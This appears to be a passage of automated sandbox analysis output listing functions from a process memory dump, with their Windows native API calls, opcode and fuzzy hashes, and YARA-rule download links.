Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeapInformationProcessQueryRaiseStatus
String ID:
API String ID: 1560743067-0
Opcode ID: f19a2dee6f061bf67b4cdbf9b4d9c5a2f7391fae3391a3c2590529e292812bd6
Instruction ID: e91a4c99230b578da58706191727c2f52439e73eeb99b4041b75b87497c20bb5
Opcode Fuzzy Hash: f19a2dee6f061bf67b4cdbf9b4d9c5a2f7391fae3391a3c2590529e292812bd6
Instruction Fuzzy Hash: CA318E75A14289EFD704CF58C840B9ABBE4FB0A314F158266F904CB342DB35EC80DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6AB9BC2C, Relevance: 4.6, APIs: 3, Instructions: 88memoryCOMMON

Download Yara Rule

APIs

RtlAcquireSRWLockExclusive.1105(?,?,00000000,00000000,6AB7F875,6AB4C318,00000000,?,00000000,00000000,6AB4C318), ref: 6AB9BC79
RtlReleaseSRWLockExclusive.1105(?,?,?,00000000,00000000,6AB7F875,6AB4C318,00000000,?,00000000,00000000,6AB4C318), ref: 6AB9BC8D
RtlAllocateHeap.1105(?,00000008,000000D0,?,?,?,00000000,00000000,6AB7F875,6AB4C318,00000000,?,00000000,00000000,6AB4C318), ref: 6AB9BCA6

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: ExclusiveLock$AcquireAllocateHeapRelease
String ID:
API String ID: 614792542-0
Opcode ID: 5ab139bae0347fbf7af6fb4770ac2d190f718c03a9e72a533bcca6b5a74a93f5
Instruction ID: 73d4b60611377ea676bc5a288fa00f6d39d90a61f02d73e37ee0333c96d65f9e
Opcode Fuzzy Hash: 5ab139bae0347fbf7af6fb4770ac2d190f718c03a9e72a533bcca6b5a74a93f5
Instruction Fuzzy Hash: AE31FF32A00A95ABCB41DF68C4807A67BB4EF5A314F050078E848EF202EF74DD65AB80

Uniqueness

Uniqueness Score: -1.00%

Function 6ABA90AF, Relevance: 4.6, APIs: 3, Instructions: 76memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.1105(?,00000008,00000066,00000066,00000000,00000000,00000000,00000000,00000066,00000000), ref: 6ABA90F5
memcpy.1105(00000010,00000000,00000066,00000008,00000066,00000066,00000000,00000000,00000000,00000000,00000066,00000000), ref: 6ABA910B
RtlCompareMemory.1105(00000010,?,00000066,00000000,00000000,00000000,00000000,00000066,00000000), ref: 6ABE14DF

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateCompareHeapMemorymemcpy
String ID:
API String ID: 2355910289-0
Opcode ID: bb615873f81361719187d27c495938dea75b42ff7b06a378128c5d9d45215186
Instruction ID: 86829656c00f31c90ee77d91536c4f9fb635b27382a7040817750cb49589b053
Opcode Fuzzy Hash: bb615873f81361719187d27c495938dea75b42ff7b06a378128c5d9d45215186
Instruction Fuzzy Hash: 7E218071A44244FFD720CF69D844A9ABBF8FB54354F15886AEA58A7200DB31ED00FB90

Uniqueness

Uniqueness Score: -1.00%

Function 6AB912BD, Relevance: 4.6, APIs: 3, Instructions: 67memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.1105(?,00000000,?,?,-00000001,?,?,?,6AB9127D,?,00000000,?,6ABBFC21,00000000,00000000), ref: 6AB91331
memcpy.1105(00000000,?,?,?,00000000,?,?,-00000001,?,?,?,6AB9127D,?,00000000,?,6ABBFC21), ref: 6AB91350

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeapmemcpy
String ID:
API String ID: 1925790395-0
Opcode ID: 6b13e33d96208af453f9dd900d6edd721fae75c25946aa76b12f0047cc4f4821
Instruction ID: 3f3bd9425d838b5c94549effe6ead52d6dde30ce76adc3f03780fda4beba64db
Opcode Fuzzy Hash: 6b13e33d96208af453f9dd900d6edd721fae75c25946aa76b12f0047cc4f4821
Instruction Fuzzy Hash: 7F214771604680AFD764CF28D881B6AB7FDFB46350F15886DE5AAC7612DE30A840EB60

Uniqueness

Uniqueness Score: -1.00%

Function 6AB728FD, Relevance: 4.6, APIs: 3, Instructions: 59COMMON

Download Yara Rule

APIs

RtlLeaveCriticalSection.1105(6AC55350,00000000,?,6AC584D8,?,?,6AB70936,00000000,?,6AC584D8,?,6AC584D8,?,00000000,?,?), ref: 6AB7290D
RtlGetCurrentServiceSessionId.1105(6AC55350,00000000,?,6AC584D8,?,?,6AB70936,00000000,?,6AC584D8,?,6AC584D8,?,00000000,?,?), ref: 6AB72923
RtlGetCurrentServiceSessionId.1105 ref: 6ABC7788

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentServiceSession$CriticalLeaveSection
String ID:
API String ID: 3230880662-0
Opcode ID: 621f17fc0b2a52e4419a0e106a8903312f77989386d9c4123d1816ab8ad8c8d0
Instruction ID: 6f6962d70588970ce876c09af93b4c640d9f35080cd1b890c95102e9cd1bd534
Opcode Fuzzy Hash: 621f17fc0b2a52e4419a0e106a8903312f77989386d9c4123d1816ab8ad8c8d0
Instruction Fuzzy Hash: 8D1108357456C4BBE331832DCD48F1637A8DF81754F1600A6F9119B293EEE4D840A221

Uniqueness

Uniqueness Score: -1.00%

Function 6ABE46A7, Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.1105(?,00000000,00000030,?,00000000,?,6ABCF5F2,?,00000024,00000000,?), ref: 6ABE46CB
memcpy.1105(00000000,00000000,00000000,00000024,?,00000000,00000030,?,00000000,?,6ABCF5F2,?,00000024,00000000,?), ref: 6ABE46F4
RtlFreeHeap.1105(?,00000000,00000000,00000030,?,00000000,?,6ABCF5F2,?,00000024,00000000,?), ref: 6ABE4725

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$AllocateFreememcpy
String ID:
API String ID: 4030768257-0
Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
Instruction ID: d47de08122baa84828b109769e6f5fdf6c5bbf9f38d107fac5638704eaab6e9a
Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
Instruction Fuzzy Hash: FE11C272604248BBC7058F6DD8808BEBBB9EF95344F1080AAF94487351DB328D55E7A4

Uniqueness

Uniqueness Score: -1.00%

Function 6AB6A63B, Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.1105(?,00000000,?,?,-00000001,?,6AB912AD,?,00000000,?,6ABBFC21,00000000,00000000), ref: 6ABC4314

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 77f27d88c44c8dcde9f005bc386a9c297ba5f52d490b3480aa34bf02d582866e
Instruction ID: 3913c427d207f9a2f1b88344e9598997440441ceed11f94240e59439f9461af7
Opcode Fuzzy Hash: 77f27d88c44c8dcde9f005bc386a9c297ba5f52d490b3480aa34bf02d582866e
Instruction Fuzzy Hash: FF11E07B6211C1AACB258F28C941E2133F5FF8AB64B510024F904FB351EF35AC61E764

Uniqueness

Uniqueness Score: -1.00%

Function 6ABA37F5, Relevance: 4.6, APIs: 3, Instructions: 57memoryCOMMON

Download Yara Rule

APIs

RtlAcquireSRWLockExclusive.1105(6AC58550,?,?,?,6AB7ED20,6AC584D8,6AC584D8,6ABB17F0,00000000,?,6AB8F715,6AB8F5C0,?,?,?,00000001), ref: 6ABA3808
RtlReleaseSRWLockExclusive.1105(6AC58550,?,?,?,6AB7ED20,6AC584D8,6AC584D8,6ABB17F0,00000000,?,6AB8F715,6AB8F5C0,?,?,?,00000001), ref: 6ABA384B
RtlFreeHeap.1105(?,00000000,00000000,?,?,?,6AB7ED20,6AC584D8,6AC584D8,6ABB17F0,00000000,?,6AB8F715,6AB8F5C0,?,?), ref: 6ABA3863

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: ExclusiveLock$AcquireFreeHeapRelease
String ID:
API String ID: 3645524765-0
Opcode ID: 814b0c6788673811988978778e8de786a02222840ca2ef11eb3fc1e9a19adb06
Instruction ID: d826d0244453738eb3b29d35c460df4dc3f476fcfb995290b682b7ef60f66d3d
Opcode Fuzzy Hash: 814b0c6788673811988978778e8de786a02222840ca2ef11eb3fc1e9a19adb06
Instruction Fuzzy Hash: 0201D6BEA4E6909BC3278B1D9940E1AFFF6DF86B60B164069F6558B211DF30C841E7C0

Uniqueness

Uniqueness Score: -1.00%

Function 6AB63E80, Relevance: 4.6, APIs: 3, Instructions: 55nativeCOMMON

Download Yara Rule

APIs

RtlGetCurrentServiceSessionId.1105(00000000,?,?), ref: 6AB63EAA
RtlGetCurrentServiceSessionId.1105(00000000,?,?), ref: 6ABC0245
ZwTraceEvent.1105(?,00000402,00000008,?,00000000,?,?), ref: 6ABC026C

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentServiceSession$EventTrace
String ID:
API String ID: 4061387822-0
Opcode ID: bf3c101f907022589d3c62f4107efc0b2166409c7518d78a834a36215bbaabe2
Instruction ID: 2b248d16909300b2aa35ebfe04103064f9a5ec05c5a75d70e0c5fc17e7de2c82
Opcode Fuzzy Hash: bf3c101f907022589d3c62f4107efc0b2166409c7518d78a834a36215bbaabe2
Instruction Fuzzy Hash: DB1102B1A016889FC720CFA8C844B6EB7B8FF44300F0500A6E915AB252EE34D940DB60

Uniqueness

Uniqueness Score: -1.00%

Function 6AC2138A, Relevance: 4.5, APIs: 3, Instructions: 48nativeCOMMON

Download Yara Rule

APIs

memset.1105(?,00000000,00000030,7FFE0380,?,?,00001000,0000003C,000000FF,?,00000003,00000014,00000014), ref: 6AC213AA
RtlGetCurrentServiceSessionId.1105(?,7FFE0380,?,?,00001000,0000003C,000000FF,?,00000003,00000014,00000014), ref: 6AC213CD
ZwTraceEvent.1105(?,00020402,00000010,?,?,7FFE0380,?,?,00001000,0000003C,000000FF,?,00000003,00000014,00000014), ref: 6AC213FA

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentEventServiceSessionTracememset
String ID:
API String ID: 4204234202-0
Opcode ID: cbade6a26bbbd6b48d35084c0dfa27f9faeb28e452a0400e7d25b879dd20a504
Instruction ID: f2d66661ce8540fe721b4513572ac1a118bd3e127613cfe4313f32c7bd2ea084
Opcode Fuzzy Hash: cbade6a26bbbd6b48d35084c0dfa27f9faeb28e452a0400e7d25b879dd20a504
Instruction Fuzzy Hash: F2018C71A05258ABDB14DFADC845AAEBBB8EF44710F014066FA14EB281EA719A40DB90

Uniqueness

Uniqueness Score: -1.00%

Function 6AB670C0, Relevance: 4.5, APIs: 3, Instructions: 48memorynativeCOMMON

Download Yara Rule

APIs

ZwClose.1105(?,7FFFFFFF,6ABB17F0,?,6AB67096,7FFFFFFF,?,?,?,?,6ABF430E,?,6AC408D0,00000008,6AB99B80,?), ref: 6AB6710A
RtlFreeHeap.1105(?,00000000,7FFFFFFF,7FFFFFFF,6ABB17F0,?,6AB67096,7FFFFFFF,?,?,?,?,6ABF430E,?,6AC408D0,00000008), ref: 6AB67126

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseFreeHeap
String ID:
API String ID: 1266433183-0
Opcode ID: 06d75836c9573aa0e55f1f59fba811012c8e74f5e68e5d7ca759bd447d74ee88
Instruction ID: c5f80f4efccb9959c83ca7d1ea22e07c81872acba608bb20e869ad342a549cd6
Opcode Fuzzy Hash: 06d75836c9573aa0e55f1f59fba811012c8e74f5e68e5d7ca759bd447d74ee88
Instruction Fuzzy Hash: 7B11AD72551B81DFD3218F19C880B12B7E1FF50726F16C869D8994A562DBB8E8C0EB60

Uniqueness

Uniqueness Score: -1.00%

Function 6AC214FB, Relevance: 4.5, APIs: 3, Instructions: 48nativeCOMMON

Download Yara Rule

APIs

memset.1105(?,00000000,00000030,-00010018), ref: 6AC2151B
RtlGetCurrentServiceSessionId.1105(?,-00010018), ref: 6AC2153E
ZwTraceEvent.1105(?,00020402,00000010,?,?,-00010018), ref: 6AC2156B

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentEventServiceSessionTracememset
String ID:
API String ID: 4204234202-0
Opcode ID: 1e4615aa481246fa2416ef5f6b45bfd97f9a99b3b744f858ff0c277f836b93c6
Instruction ID: 0812077c7451df1f1989870956616fdea2ba56841534ec21aabfe75f74cf396e
Opcode Fuzzy Hash: 1e4615aa481246fa2416ef5f6b45bfd97f9a99b3b744f858ff0c277f836b93c6
Instruction Fuzzy Hash: 4D01DE70A0128CAFDB00DFACC805EAEBBB8EF44300F004066F914EB281EA70DE00CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6AC1FE3F, Relevance: 4.5, APIs: 3, Instructions: 46nativeCOMMON

Download Yara Rule

APIs

memset.1105(?,00000000,00000030,?,00000000), ref: 6AC1FE5F
RtlGetCurrentServiceSessionId.1105(?,?,00000000), ref: 6AC1FE7C
ZwTraceEvent.1105(?,00020402,00000010,?,?,?,00000000), ref: 6AC1FEA9

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentEventServiceSessionTracememset
String ID:
API String ID: 4204234202-0
Opcode ID: fb491ff64ba59a1ecfefbbfbc33c3c7e90b554345a2c0a67ab4ed7af546c6995
Instruction ID: d581f41a97f3c9028d7486a0611cdeb3678997bddf777b54e81a3e8f582d15c5
Opcode Fuzzy Hash: fb491ff64ba59a1ecfefbbfbc33c3c7e90b554345a2c0a67ab4ed7af546c6995
Instruction Fuzzy Hash: ED01B171A05248AFCB14DFA9D845EAEB7B8EF40704F014066F910AB281DE709900D794

Uniqueness

Uniqueness Score: -1.00%

Function 6AB8746D, Relevance: 4.5, APIs: 3, Instructions: 31memorynativeCOMMON

Download Yara Rule

APIs

ZwClose.1105(00000000,6AB870EF,00000024,00000000,?), ref: 6ABCF93A
RtlFreeHeap.1105(?,00000000,?,00000000,6AB870EF,00000024,00000000,?), ref: 6ABCF94E

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseFreeHeap
String ID:
API String ID: 1266433183-0
Opcode ID: 0c8aefcc99fd4e773120f1ecd29afc75156d3c356164b4e35c8b14edf0ded984
Instruction ID: 3794cba29149f4ee9cc241ef84172af58ee8fcea18fe88914412d2b4a98b8f12
Opcode Fuzzy Hash: 0c8aefcc99fd4e773120f1ecd29afc75156d3c356164b4e35c8b14edf0ded984
Instruction Fuzzy Hash: 20F0F0746452C8FACB11866CC840B697BB1EF01B9CF094155D461A7151EFE5C880B786

Uniqueness

Uniqueness Score: -1.00%

Function 6AB62CDB, Relevance: 4.5, APIs: 3, Instructions: 21nativememoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.1105(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,6AB62CD7), ref: 6AB62CFB
ZwClose.1105(?,?,?,?,?,?,?,?,?,?,?,6AB62CD7), ref: 6AB62D04
ZwSetEvent.1105(00000000,00000000,?,?,?,?,?,?,?,?,?,?,6AB62CD7), ref: 6ABBF975

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseEventFreeHeap
String ID:
API String ID: 4036969103-0
Opcode ID: a2301cbb80807bd86986fb20a83a6222ed7f6f329ba40549649f5f350f115ca8
Instruction ID: 93f14833849235e616a60e2947dfadcaf66e0202c88f264a17701b5b62caef2d
Opcode Fuzzy Hash: a2301cbb80807bd86986fb20a83a6222ed7f6f329ba40549649f5f350f115ca8
Instruction Fuzzy Hash: 0DE08C3148A790EFEB315E28EC09F4676B1FF40714F121469E180054A58FB19891FB40

Uniqueness

Uniqueness Score: -1.00%

Function 6AB86E30, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 481COMMON

Download Yara Rule

APIs

memset.1105(01000000,00000000,?,?,00000024,00000000,?), ref: 6AB86F17

Strings

., xrefs: 6AB872F1

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: memset
String ID: .
API String ID: 2221118986-248832578
Opcode ID: de9061924bd676966bf16a379b7728d5b4eae33674ebd84d37a12a48079793c7
Instruction ID: 6cacf708fa0724c0dd0a57ac4f09816c73af9077c05fed4ad979cc5a7e4fca68
Opcode Fuzzy Hash: de9061924bd676966bf16a379b7728d5b4eae33674ebd84d37a12a48079793c7
Instruction Fuzzy Hash: 940280B1E14295DBCB24CF9CC490AADBBB1FF45708F22402EE415EB251EBB098D1EB51

Uniqueness

Uniqueness Score: -1.00%

Function 6AB78A0A, Relevance: 3.1, APIs: 2, Instructions: 120COMMON

Download Yara Rule

APIs

RtlImageNtHeaderEx.1105(00000001,?,00000000,00000000,?,00000040,-00000054,00000000), ref: 6AB78A6A

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: HeaderImage
String ID:
API String ID: 1925295642-0
Opcode ID: c5d21ce60a40dd86b52b0961b534fa84edef8fe177f00acda3e905bd6e98f8a4
Instruction ID: 186e88dc5068cdf9ef6b206055edf87303320eb2a85f96d9c9d23bac5befe744
Opcode Fuzzy Hash: c5d21ce60a40dd86b52b0961b534fa84edef8fe177f00acda3e905bd6e98f8a4
Instruction Fuzzy Hash: 0A4186B0A4526C9BDB74CF99C888AA9B3F4EB45304F1141E5D92897342DBB1DEC0DF50

Uniqueness

Uniqueness Score: -1.00%

Function 6AB91520, Relevance: 3.1, APIs: 2, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7f7b3f98375b7b0c5ad75db5e01c180b946a37114be065bdfeada9399aafa4c
Instruction ID: 12534d80fd08c3ecfd8f8cd719713757a0b87cae5dbdc6d7f415a0173bb08ec9
Opcode Fuzzy Hash: c7f7b3f98375b7b0c5ad75db5e01c180b946a37114be065bdfeada9399aafa4c
Instruction Fuzzy Hash: AB41DE31A097C09FE3A5CE29E45071A7BF9FB47714F09467DE9A28B681DB34D840EB60

Uniqueness

Uniqueness Score: -1.00%

Function 6AB961A0, Relevance: 3.1, APIs: 2, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b7edf8106dd5af769db1c58e949d7742bf154d6b279c1c0bd552afb5dfcfd6df
Instruction ID: 2d71ef29a30019f346fb59ecba65194cd34e1eaad7f59a2e248bbf38252b9521
Opcode Fuzzy Hash: b7edf8106dd5af769db1c58e949d7742bf154d6b279c1c0bd552afb5dfcfd6df
Instruction Fuzzy Hash: 1C31AF71A097918FD360DF19C810B5ABBE4FF89B00F12497DE9949B361EBB0D844EB91

Uniqueness

Uniqueness Score: -1.00%

Function 6AB9DF4C, Relevance: 3.1, APIs: 2, Instructions: 62memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.1105(?,00000000,?,00000000,?,?,?,?,?,6AB63DAD,?,00000000,6AC3F4D0,00000084,6AB63A18,00000000), ref: 6AB9DFB0
RtlWakeAddressAllNoFence.1105(00000000), ref: 6AB9DFCC

Part of subcall function 6AB6A745: RtlAcquireSRWLockExclusive.1105(?,?,00000000,?,6AB9DFD8,00000000,?,?,?,?,?,6AB63DAD,?,00000000,6AC3F4D0,00000084), ref: 6AB6A757
Part of subcall function 6AB6A745: RtlReleaseSRWLockExclusive.1105(?,?,?,00000000,?,6AB9DFD8,00000000,?,?,?,?,?,6AB63DAD,?,00000000,6AC3F4D0), ref: 6AB6A774

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: ExclusiveLock$AcquireAddressFenceFreeHeapReleaseWake
String ID:
API String ID: 4187599678-0
Opcode ID: eb68034816a1b22d4d42b68bfa87daaead973648ca8f5c3e9f107cae683dcf72
Instruction ID: e1d57fed50718711e8d472ef2b3ca7b5c6ae1669132cabd6cee1d6f8ac1bf940
Opcode Fuzzy Hash: eb68034816a1b22d4d42b68bfa87daaead973648ca8f5c3e9f107cae683dcf72
Instruction Fuzzy Hash: 471190722016849FC719CF1AD441B66BBF9EF46321F01817DE4098B6A0EB70EC41DB90

Uniqueness

Uniqueness Score: -1.00%

Function 6AB7FC01, Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e692abe2f850a23d793730336e43581be8af51412f5f69949d96b54298cb95a0
Instruction ID: 268400fd6675754bfd87c4b6fc3701556cdd4d9e6c1e42ee1e77a015e6db4ac5
Opcode Fuzzy Hash: e692abe2f850a23d793730336e43581be8af51412f5f69949d96b54298cb95a0
Instruction Fuzzy Hash: 4B21E1706056C9DFD7228FB8C858BAD7BB4FF05748F014494EA109B2A2DFB8C940E766

Uniqueness

Uniqueness Score: -1.00%

Function 6AB64CB0, Relevance: 3.1, APIs: 2, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.1105(?,?,?), ref: 6AB64D02
memcpy.1105(00000000,?,?), ref: 6AB64D13

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeapmemcpy
